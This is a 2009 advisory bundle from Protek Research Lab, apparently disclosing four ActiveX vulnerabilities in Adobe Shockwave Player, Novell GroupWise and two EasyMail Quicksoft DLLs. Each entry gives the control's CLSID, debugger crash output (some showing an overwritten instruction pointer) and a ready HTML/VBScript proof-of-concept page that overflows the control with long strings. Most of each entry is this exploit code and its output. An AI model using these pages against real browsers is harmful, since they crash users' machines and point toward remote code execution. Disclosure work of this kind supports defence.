Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
Application: Adobe ShockWave Player (11.5.1.601)
Platforms: Windows XP Professional French SP2 and SP3
crash: IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Over 450 million Internet-enabled desktops have installed Adobe Shockwave
Player.
These people now have access to some of the best the Web has to offer -
including dazzling 3D games and entertainment,
interactive product demonstrations, and online learning applications. Shockwave
Player displays Web content that has been created by Adobe Director.
#####################################################################################
============================
2) Technical details
============================
Name: SwDir.dll
Ver.: 11.5.1.601
CLSID: {233C1507-6A77-46A4-9443-F871F945D258}
(d40.b20): Stack overflow - code c00000fd
eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code;
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2097152, "A")
ShockW.PlayerVersion = arg1
</script>
#####################################################################################
#####################################################################################
Application: Novell Groupwise Client 7.0.3.1294
Platforms: Windows XP Professional French SP2 and SP3
crash: IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
GroupWise is a messaging and collaborative software platform from Novell that
supports email, calendaring, personal information management, instant
messaging, and document management. The platform consists of the client
software, which is available for Windows, Mac OS X, and Linux, and the server
software, which is supported on Windows Server, Netware, and Linux. The latest
generation of the platform is GroupWise 8, which was launched in 2008.
#####################################################################################
============================
2) Technical details
============================
Name: gxmim1.dll
Ver.: 7.0.3.1294
CLSID: {9796BED2-C1CF-11D2-9384-0008C7396667}
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code;
<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667'
id='GWComposeCtl'></object>
<script language='vbscript'>
argCount = 1
arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
GWComposeCtl.SetFontFace arg1
</script>
#####################################################################################
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Create, send, download, parse, print and store internet email messages in your
classic windows application. Designed for Visual Basic, ASP, C++, Delphi,
ColdFusion, PowerBuilder, Access and other development environments. COM or
standard DLL interfaces. This is the software that processes hundreds of
millions of email messages on the Internet every day.
#####################################################################################
============================
2) Technical details
============================
Name: emimap4.dll
Ver.: 6.0.2.0
CLSID: {0CEA3FB1-7F88-4803-AA8E-AD021566955D}
ModLoad: 037f0000 0381e000 C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code;
<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D'
id='target'></object>
<script language = 'vbscript'>
Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";)
code = Scrap
target.LicenseKey = code
</script>
<html>
~
#####################################################################################
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Create, send, download, parse, print and store internet email messages in your
classic windows application. Designed for Visual Basic, ASP, C++, Delphi,
ColdFusion, PowerBuilder, Access and other development environments. COM or
standard DLL interfaces. This is the software that processes hundreds of
millions of email messages on the Internet every day.
#####################################################################################
============================
2) Technical details
============================
Name: emmailstore.dll
Ver.: 6.0.2.0
CLSID: {18A76B9A-45C1-11D3-80DC-00C04F6B92D0}
ModLoad: 10000000 1002c000 C:\WINDOWS\system32\emmailstore.dll
(1670.59c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000002bd ebx=00000000 ecx=0003ea80 edx=00030608 esi=00038790 edi=00000193
eip=41414141 esp=0013eb44 ebp=0013eb60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
41414141 ?? ???
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code;
<HTML>
<object classid='clsid:18A76B9A-45C1-11D3-80DC-00C04F6B92D0' id='target' />
<script language='vbscript'>
argCount = 2
arg1=String(402, "A")
arg2=1
target.CreateStore arg1 ,arg2
</script>
<html>
~
#####################################################################################
